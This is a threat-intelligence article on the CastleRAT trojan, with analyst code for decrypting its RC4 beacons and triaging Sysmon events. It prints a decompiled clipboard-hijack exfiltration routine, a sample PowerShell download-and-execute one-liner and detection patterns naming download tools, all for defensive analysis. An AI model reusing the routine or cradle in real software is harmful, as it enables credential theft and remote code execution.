A new Remote Access Trojan known as CastleRAT has emerged as a growing threat to Windows systems worldwide.
First observed around March 2025, the malware gives attackers full remote control over compromised machines.
The threat comes in two main builds: a lightweight Python version and a more capable compiled C version, with the latter offering advanced features including keystroke capture, screen grabs, and persistence mechanisms.
CastleRAT encrypts its command-and-control (C2) traffic with RC4 under a hardcoded key. Because the key is static and embedded in the binary, anyone who extracts it from a sample can decrypt captured traffic.
Once deployed, the malware collects system information such as computer name, username, machine GUID, public IP address, and product details, then transmits this data to the attacker.
The infected host then receives instructions and additional tooling from the C2 server, allowing the attacker to execute commands remotely.
Splunk security researchers found that CastleRAT employs several techniques that map to the MITRE ATT&CK framework.
The malware gathers basic system details and uses free web services such as ip-api.com to obtain the host's public IP address as part of its regular beaconing.
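As an added example (not code from the CastleRAT sample or from Splunk's write-up), the following Python models a beacon encrypted with RC4 under a hardcoded key, as described above, and shows what an analyst can do once such a key has been pulled from a sample. The key value, the JSON layout and the field names are assumptions; the real sample's key and wire format are not given on this page. It also shows why a static key with no nonce is weak: two ciphertexts XOR to the XOR of their plaintexts.

```python
# Added example, not code from the CastleRAT sample or the Splunk write-up.
# Models a beacon encrypted with RC4 under a hardcoded key, as the article
# describes, and what an analyst can do once the key is pulled from a sample.
# ASSUMPTIONS: the key value, the JSON layout and the field names below are
# illustrative; the real sample's key and wire format are not given here.
import json


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). The same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:                            # keystream generation + XOR
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Hypothetical hardcoded key, standing in for one recovered from a sample.
HARDCODED_KEY = b"c4stl3-r4t-k3y"

# Field names the article lists; the JSON layout itself is an assumption.
EXPECTED_FIELDS = {"host", "user", "guid", "ip", "product"}


def build_beacon(host, user, guid, ip, product) -> bytes:
    """Constructed beacon: serialize the collected fields and RC4 them."""
    plain = json.dumps({"host": host, "user": user, "guid": guid,
                        "ip": ip, "product": product}, sort_keys=True)
    return rc4(HARDCODED_KEY, plain.encode())


def decrypt_beacon(blob: bytes, key: bytes = HARDCODED_KEY) -> dict:
    """Analyst side: with the static key, every captured beacon decrypts."""
    return json.loads(rc4(key, blob).decode())


def key_fits(blob: bytes, candidate: bytes) -> bool:
    """Known-plaintext check for a candidate key: RC4 has no integrity tag,
    so a wrong key yields garbage rather than an error."""
    try:
        obj = json.loads(rc4(candidate, blob).decode())
    except (UnicodeDecodeError, ValueError):
        return False
    return isinstance(obj, dict) and EXPECTED_FIELDS.issubset(obj)


def keystream_reuse_leak(blob1: bytes, blob2: bytes) -> bytes:
    """With a static key and no nonce every beacon uses the same keystream,
    so C1 XOR C2 == P1 XOR P2: zero bytes mark positions where the two
    plaintexts agree, recoverable without the key."""
    return bytes(a ^ b for a, b in zip(blob1, blob2))


if __name__ == "__main__":
    # Constructed sample values.
    b1 = build_beacon("WS-FIN01", "jdoe", "5f4c9b2e-7a1d-4e6b-9c3a-0d8e2f1a6b7c",
                      "203.0.113.7", "Windows 10 Pro")
    b2 = build_beacon("WS-FIN01", "asmith", "5f4c9b2e-7a1d-4e6b-9c3a-0d8e2f1a6b7c",
                      "203.0.113.7", "Windows 10 Pro")
    print(decrypt_beacon(b1))
    print("wrong key fits:", key_fits(b1, b"guess"),
          "| real key fits:", key_fits(b1, HARDCODED_KEY))
    leak = keystream_reuse_leak(b1, b2)
    print("bytes where the two beacons differ:", sum(1 for x in leak if x))
```

The key_fits check is what an analyst would run against a packet capture once a handful of candidate strings have been lifted from the binary; because RC4 provides no authentication, the only signal that a key is right is that the plaintext parses.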
Clipboard Knowledge Assortment and Exfiltration
One notable technique involves clipboard data harvesting. CastleRAT launches multiple threads within its process, each carrying out a different malicious action.
The clipboard collection thread targets users who routinely copy credentials or cryptocurrency addresses, making it an effective method for harvesting sensitive information such as usernames, passwords, and wallet strings.
CastleRAT beacon and C2 communication flow (Source – Splunk)
The malware hijacks the clipboard and simulates paste actions to exfiltrate data stealthily. Rather than opening network sockets or calling obvious network APIs, CastleRAT copies the harvested information to the clipboard and invokes SendInput() to paste it into benign-looking applications.
CastleRAT clipboard data collection (Source – Splunk)
This approach reduces noisy network artifacts and blends exfiltration into ordinary user activity, complicating detection: whatever traffic eventually carries the data originates from the application that received the paste, not from the RAT process itself.
// Decompiled clipboard routine, cleaned up. In the decompiler output the
// literals were 0i64 (NULL), 0x2000 (GMEM_MOVEABLE), 1 (CF_TEXT) and
// 40 (sizeof(INPUT) on 64-bit Windows). "Source" holds the harvested text;
// v2 is presumably its length. Only two of the four INPUT entries are set
// in this fragment; the remaining entries are not shown.
if (OpenClipboard(NULL))
{
    EmptyClipboard();
    hMem = GlobalAlloc(GMEM_MOVEABLE, v2 + 1);
    Dest = GlobalLock(hMem);
    strcpy(Dest, Source);                 // copy harvested data into the global block
    SetClipboardData(CF_TEXT, hMem);      // clipboard now holds the stolen text
    CloseClipboard();
    pInputs[0].ki.wVk = VK_CONTROL;       // Ctrl ...
    pInputs[2].ki.wVk = 'V';              // ... + V: synthesize a paste
    SendInput(4, pInputs, sizeof(INPUT)); // four key events (Ctrl and V press/release)
}
To detect this threat, organizations should monitor for unusual outbound connections, one-line PowerShell download commands, unexpected binaries in user profile folders, and indicators of RC4-encrypted traffic (opaque, high-entropy payloads on connections that carry no recognizable protocol).
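As an added example (not from the article or from Splunk's detection content), the following Python runs a small triage filter for the indicators just listed over constructed Sysmon-style records (Event ID 1 process creation, Event ID 3 network connection). The field names, paths, hosts and IP addresses are illustrative assumptions; ip-api.com is the only lookup service the article names, the others in the list are common equivalents added here. The entropy helper is the practical form of "indicators of RC4-encrypted traffic": it flags opaque payloads but cannot by itself distinguish RC4 from TLS or compression.

```python
# Added example, not from the article or from Splunk's detection content.
# A small triage filter for the indicators listed above, run over CONSTRUCTED
# Sysmon-style records (Event ID 1 = process creation, Event ID 3 = network
# connection). Field names, paths, hosts and IPs are illustrative assumptions.
import math
import re
from collections import Counter

SAMPLE_EVENTS = [
    {"event": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX((New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.9/stage.ps1'))\""},
    {"event": 1, "image": r"C:\Users\jdoe\AppData\Roaming\svchost.exe",
     "cmdline": "svchost.exe"},
    {"event": 1, "image": r"C:\Program Files\Vendor\app.exe",
     "cmdline": "app.exe --update"},
    {"event": 3, "image": r"C:\Users\jdoe\AppData\Roaming\svchost.exe",
     "dest_host": "ip-api.com", "dest_port": 80},
    {"event": 3, "image": r"C:\Users\jdoe\AppData\Roaming\svchost.exe",
     "dest_host": "", "dest_ip": "198.51.100.23", "dest_port": 8080},
    {"event": 3, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_host": "example.org", "dest_port": 443},
]

# One-line download cradles: a download verb and a URL in the same command.
PS_DOWNLOAD = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\bcurl\b|\bwget\b)"
    r".*https?://", re.I)
# Executables living under a user profile rather than Program Files / Windows.
USER_DIR = re.compile(r"^[a-z]:\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents|Temp)\\", re.I)
# ip-api.com is named in the article; the others are common equivalents (assumption).
IP_LOOKUP_HOSTS = {"ip-api.com", "ipinfo.io", "api.ipify.org"}
COMMON_WEB_PORTS = {80, 443}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte. RC4 output (or any cipher/compressed stream) sits near 8.0;
    JSON, HTML or plain text sits well below. Entropy says 'opaque', not 'RC4'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify(ev: dict) -> list:
    """Return the indicator names an event trips (possibly none)."""
    hits = []
    if ev["event"] == 1:
        if "powershell" in ev["image"].lower() and PS_DOWNLOAD.search(ev["cmdline"]):
            hits.append("powershell_oneliner_download")
        if USER_DIR.match(ev["image"]):
            hits.append("binary_in_user_folder")
    elif ev["event"] == 3:
        if ev.get("dest_host") in IP_LOOKUP_HOSTS:
            hits.append("public_ip_lookup")
        if USER_DIR.match(ev["image"]) and ev["dest_port"] not in COMMON_WEB_PORTS:
            hits.append("userdir_binary_uncommon_port")
    return hits


def triage(events) -> dict:
    """Group tripped indicators by process image so a stack of weak signals
    on one binary surfaces together."""
    findings = {}
    for ev in events:
        for h in classify(ev):
            findings.setdefault(ev["image"], []).append(h)
    return findings


if __name__ == "__main__":
    for image, hits in triage(SAMPLE_EVENTS).items():
        print(image, "->", ", ".join(hits))
    print("entropy of JSON beacon text:",
          round(shannon_entropy(b'{"host":"WS-FIN01","user":"jdoe"}'), 2))
    print("entropy of 256 distinct bytes:", shannon_entropy(bytes(range(256))))
```

None of these rules is conclusive on its own; the point of grouping by image is that a binary under AppData that both queries a public-IP service and then talks to a raw IP on an uncommon port is a much stronger signal than any one of those events.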
